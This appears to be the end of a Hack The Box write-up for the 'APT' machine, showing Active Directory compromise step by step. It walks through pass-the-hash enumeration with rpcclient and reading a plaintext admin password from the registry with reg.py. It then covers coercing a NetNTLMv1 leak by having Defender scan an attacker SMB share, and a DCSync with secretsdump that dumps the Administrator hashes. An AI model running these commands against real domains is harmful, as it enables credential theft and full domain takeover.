group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]

Take note of the RID of the Remote Management Users (0x244).

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "queryaliasmem builtin 0x244" apt.htb.local
        sid:[S-1-5-21-2993095098-2100462451-206186470-1106]

Look up the SID next.

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "lookupsids S-1-5-21-2993095098-2100462451-206186470-1106" apt.htb.local
S-1-5-21-2993095098-2100462451-206186470-1106 HTB\henry.vinson_adm (1)

Sweet. We should be looking at getting access of henry.vinson_adm next.

Impacket’s reg.py

Before we attempt to brute-force the password of henry.vinson_adm, perhaps we should take a look at the registry from henry.vinson’s view and see what we can glean from it?

python3 reg.py -k -no-pass htb.local/[email protected] query -keyName hku
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
hku
hku\Console
hku\Control Panel
hku\Environment
hku\Keyboard Layout
hku\Network
hku\Software
hku\System
hku\Volatile Environment

This is positive! Let’s dig deeper.

python3 reg.py -k -no-pass htb.local/[email protected] query -keyName hku\\Software
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
hku\Software
hku\Software\GiganticHostingManagementSystem
hku\Software\Microsoft
hku\Software\Policies
hku\Software\RegisteredApplications
hku\Software\VMware, Inc.
hku\Software\Wow6432Node
hku\Software\Classes

GiganticHostingManagementSystem??!!

python3 reg.py -k -no-pass htb.local/[email protected] query -keyName hku\\Software\\GiganticHostingManagementSystem
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
hku\Software\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#[email protected]

Gotcha!

Foothold

Armed with henry.vinson_adm’s password, we can leverage Evil-WinRM to get ourselves a shell.

The file user.txt is at henry.vinson_adm’s Desktop.

Privilege Escalation

During enumeration of henry.vinson_adm’s account, I notice the presence of PowerShell history that offers a hint of privilege escalation.

NetNTLM Downgrade Attack

Now that we know NetNTLM is downgraded to NetNTLMv1 responses, which is significantly weaker than NetNTLMv2 (also vulnerable to certain attacks), the question is this: how do we solicit a NetNTLMv1 response from the machine.

NetNTLM Response Leak

There is a GitHub repository that lists down all the various ways of leaking NetNTLM responses. Surprisingly (at least to me), Microsoft Defender can be “tricked” to scan a file over SMB, thereby leaking the NetNTLMv1 response like so. We just have to run Responder with 1122334455667788 as the challenge and the --lm switch to force NetNTLMv1 challenge/response.

Windows Defender

.\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.10\file.txt

Responder

Armed with the NetNTLMv1 response, we can head over to crack.sh to crack the response into it’s NT hash.

DCSync

Armed with the NT hash of the domain controller, we can export its TGT with Impacket’s getTGT.py and perform DCSync with Impacket’s secretsdump.py to dump Administrator’s NT hash like so.

python3 getTGT.py -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/[email protected]'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Saving ticket in [email protected]

Point KRB5CCNAME to [email protected] to use the ticket.

export KRB5CCNAME=apt\[email protected]

Dump Administrator’s NT hash.

python3 secretsdump.py -k -no-pass 'htb.local/[email protected]' -just-dc-user administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
[*] Cleaning up...

With the NT hash, we can get a shell as Administrator with Evil-WinRM.

The end is here…

:dancer: